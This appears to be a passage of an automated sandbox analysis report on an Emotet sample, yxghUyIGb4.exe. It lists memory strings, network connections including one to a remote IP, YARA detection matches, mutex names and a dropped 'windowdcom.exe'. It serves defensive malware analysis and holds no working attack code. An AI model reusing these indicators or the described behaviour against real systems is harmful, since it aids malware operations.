                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000009.00000002.308083238.0000020842064000.00000004.00000001.sdmp, svchost.exe, 00000009.00000003.307792601.0000020842041000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 00000009.00000003.307699187.0000020842060000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 0000001B.00000003.825047154.00000148F1A05000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210270479.00000148F0C8F000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                    Source: svchost.exe, 0000001B.00000003.813545902.00000148F1369000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf?iww=1
                    Source: svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfH
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExi
                    Source: svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80502
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                    Source: svchost.exe, 0000001B.00000003.813641140.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                    Source: svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813545902.00000148F1369000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                    Source: svchost.exe, 0000001B.00000002.1210384278.00000148F0CD6000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210573981.00000148F1313000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825092954.00000148F0CFD000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecunlineLog
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                    Source: svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                    Source: svchost.exe, 0000001B.00000003.813545902.00000148F1369000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf?
                    Source: svchost.exe, 0000001B.00000002.1210104992.00000148F0C29000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
                    Source: svchost.exe, 0000001B.00000003.813430606.00000148F1335000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfsrfsrf060805&fid=cp.live.com
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConneH
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                    Source: svchost.exe, 0000001B.00000003.813364124.00000148F1363000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                    Source: svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                    Source: svchost.exe, 0000001B.00000003.813343188.00000148F1350000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813301133.00000148F132E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                    Source: svchost.exe, 0000001B.00000003.813413159.00000148F134B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813421288.00000148F1329000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813334291.00000148F1377000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                    Source: svchost.exe, 0000001B.00000003.813310129.00000148F133B000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                    Source: svchost.exe, 0000001B.00000003.813436216.00000148F130E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfxL
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                    Source: svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                    Source: svchost.exe, 0000001B.00000002.1210131119.00000148F0C46000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfje
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.825107674.00000148F0D02000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/resetpw.srf
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com/retention.srf
                    Source: svchost.exe, 0000001B.00000002.1210177736.00000148F0C5D000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com:443/RST2.srf
                    Source: svchost.exe, 0000001B.00000003.822982893.00000148F133B000.00000004.00000001.sdmp | String found in binary or memory: https://login.live.com:443/RST2.srf256
                    Source: svchost.exe, 0000001B.00000003.813514950.00000148F1348000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.813609882.00000148F1331000.00000004.00000001.sdmp | String found in binary or memory: https://signup.live.com/signup.aspx
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000009.00000002.308058591.000002084203D000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.308009587.0000020842013000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.307787079.0000020842045000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000009.00000003.285964964.0000020842030000.00000004.00000001.sdmp | String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000009.00000003.307704369.0000020842049000.00000004.00000001.sdmp | String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
                    Source: windowdcom.exe, 00000003.00000003.278462097.0000000000BB2000.00000004.00000001.sdmp | String found in binary or memory: https://watson.telemet43/
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49744
                    Source: unknown | Network traffic detected: HTTP traffic on port 49757 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49758 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49744 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49758
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49757
                    Source: unknown | HTTPS traffic detected: 167.114.153.153:443 -> 192.168.2.3:49744 version: TLS 1.2

                    E-Banking Fraud:

                    Yara detected Emotet
                    Source: Yara match | File source: yxghUyIGb4.exe, type: SAMPLE
                    Source: Yara match | File source: 00000001.00000000.196238760.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000000.202814564.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1275643184.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000002.203168982.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.195274651.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.196554240.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000002.00000000.201989781.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000001.00000002.203523658.0000000000821000.00000020.00020000.sdmp, type: MEMORY
                    Source: Yara match | File source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE
                    Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90

                    System Summary:

                    Malicious sample detected (through community Yara rule)
                    Source: yxghUyIGb4.exe, type: SAMPLE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet Payload Author: kevoreilly
                    Source: C:\Windows\SysWOW64\windowdcom.exe | File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | File deleted: C:\Windows\SysWOW64\windowdcom.exe:Zone.Identifier
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_008277F0
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_00826E70
                    Source: yxghUyIGb4.exe, 00000001.00000002.203555324.0000000000920000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs yxghUyIGb4.exe
                    Source: yxghUyIGb4.exe, 00000001.00000002.203590206.0000000000980000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs yxghUyIGb4.exe
                    Source: yxghUyIGb4.exe, 00000001.00000002.203590206.0000000000980000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs yxghUyIGb4.exe
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Section loaded: cldapi.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
                    Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
                    Source: yxghUyIGb4.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: yxghUyIGb4.exe, type: SAMPLE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 1.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.0.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 3.0.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 3.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 0.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 1.2.yxghUyIGb4.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: 2.2.windowdcom.exe.820000.0.unpack, type: UNPACKEDPE | Matched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
                    Source: classification engine | Classification label: mal96.troj.evad.winEXE@17/8@0/13
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Code function: 0_2_00822110 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Mutant created: \BaseNamedObjects\M82F5233F
                    Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2132:120:WilError_01
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\M6A9F2F98
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\I6A9F2F98
                    Source: C:\Windows\SysWOW64\windowdcom.exe | Mutant created: \BaseNamedObjects\Global\I6A9F2F98
                    Source: C:\Users\user\Desktop\yxghUyIGb4.exe | Mutant created: \Sessions\1\BaseNamedObjects\M3273981E
                    Source: yxghUyIGb4.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
